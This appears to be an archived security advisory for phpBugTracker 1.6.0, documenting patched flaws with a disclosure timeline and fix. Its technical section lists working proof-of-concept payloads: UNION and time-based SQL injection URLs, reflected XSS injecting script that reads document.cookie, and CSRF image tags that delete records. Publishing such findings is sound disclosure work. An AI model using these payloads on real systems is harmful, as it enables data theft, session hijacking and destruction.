phpBugTracker 1.6.0 CSRF / XSS / SQL Injection

2015-02-19T00:00:00
ID PACKETSTORM:130463
Type packetstorm
Reporter Steffen Roesemann
Modified 2015-02-19T00:00:00

Description

                                        
                                            `Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in  
phpBugTracker v.1.6.0  
Advisory ID: SROEADV-2015-16  
Author: Steffen Rösemann  
Affected Software: phpBugTracker v.1.6.0  
Vendor URL: https://github.com/a-v-k/phpBugTracker  
Vendor Status: patched  
CVE-ID: will asked to be assigned after release on FullDisclosure via  
OSS-list  
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31  
  
==========================  
Vulnerability Description:  
==========================  
  
The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,  
stored/reflected XSS- and CSRF-vulnerabilities.  
  
==================  
Technical Details:  
==================  
  
The following files used in a common phpBugTracker installation suffer from  
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:  
  
===========  
project.php  
===========  
  
SQL injection / underlaying CSRF vulnerability in project.php via id  
parameter:  
  
http://  
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+  
  
Stored XSS via input field "project name":  
  
http://{TARGET}/admin/project.php?op=add  
  
executed in: e.g. http://{TARGET}/admin/project.php, http://  
{TARGET}/index.php  
  
  
========  
user.php  
========  
  
Reflecting XSS in user.php via use_js parameter:  
  
http://  
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1  
  
executed in: same page  
  
  
=========  
group.php  
=========  
  
Reflecting XSS in group.php via use_js parameter:  
  
http://  
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1  
  
executed in: same page  
  
(Blind) SQL Injection / underlaying CSRF vulnerability in group.php via  
group_id parameter (used in different operations):  
  
http://  
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+  
http://  
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+  
  
  
==========  
status.php  
==========  
  
SQL injection / underlaying CSRF vulnerability in status.php via status_id  
parameter:  
  
http://  
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+  
  
Stored XSS via input field "Description":  
  
http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0  
  
executed in: e.g. http://{TARGET}/admin/status.php  
  
CSRF vulnerability in status.php (delete statuses):  
  
<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"  
>  
  
  
==============  
resolution.php  
==============  
  
SQL injection / underlaying CSRF vulnerability in resolution.php via  
resolution_id parameter:  
  
http://  
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+  
  
CSRF vulnerability in resolution.php (delete resolutions):  
  
<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"  
>  
  
  
============  
severity.php  
============  
  
SQL injection / underlaying CSRF vulnerability in severity.php via  
severity_id parameter:  
  
http://  
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+  
  
CSRF vulnerability in severity.php (delete severities):  
  
<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"  
>  
  
Stored XSS in severity.php via input field "Description":  
  
http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0  
  
executed in: e.g. http://{TARGET}/admin/severity.php  
  
  
============  
priority.php  
============  
  
SQL injection / underlaying CSRF vulnerability in priority.php via  
priority_id parameter:  
  
http://  
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+  
  
  
======  
os.php  
======  
  
SQL Injection / underlaying CSRF vulnerability in os.php via os_id  
parameter:  
  
http://  
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+  
  
CSRF vulnerability in os.php (delete operating systems):  
  
<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >  
  
Stored XSS vulnerability in os.php via input field "Regex":  
  
http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0  
  
executed in: e.g. http://{TARGET}/admin/os.php?  
  
  
============  
database.php  
============  
  
SQL injection / underlaying CSRF vulnerability in database.php via  
database_id:  
  
http://  
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+  
  
CSRF vulnerability in database.php (delete databases):  
  
<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"  
>  
  
Stored XSS vulnerability in database.php via input field "Name":  
  
http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0  
  
  
========  
site.php  
========  
  
CSRF vulnerability in site.php (delete sites):  
  
<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >  
  
SQL injection / underlaying CSRF vulnerability in site.php via site_id  
parameter:  
  
http://  
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+  
  
  
=======  
bug.php  
=======  
  
This issue has already been assigned CVE-2004-1519, but seems to have not  
been corrected since the assignment:  
  
SQL injection / underlaying CSRF vulnerability in bug.php via project  
parameter:  
  
http://  
{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+  
  
For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.  
  
  
  
=========  
Solution:  
=========  
  
Update to version 1.7.0.  
  
  
====================  
Disclosure Timeline:  
====================  
03/05-Feb-2015 – found the vulnerabilities  
05-Feb-2015 - informed the developers (see [3])  
05-Feb-2015 – release date of this security advisory [without technical  
details]  
05-Feb-2015 - forked the Github repository, to keep it available for other  
security researchers (see [4])  
05/06-Feb-2015 - vendor replied, will provide a patch for the  
vulnerabilities  
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical  
details will be released on 19th February 2015  
19-Feb-2015 - release date of this security advisory  
19-Feb-2015 - send to FullDisclosure  
  
  
========  
Credits:  
========  
  
Vulnerabilities found and advisory written by Steffen Rösemann.  
  
===========  
References:  
===========  
  
[1] https://github.com/a-v-k/phpBugTracker  
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html  
[3] https://github.com/a-v-k/phpBugTracker/issues/4  
[4] https://github.com/sroesemann/phpBugTracker  
  
  
`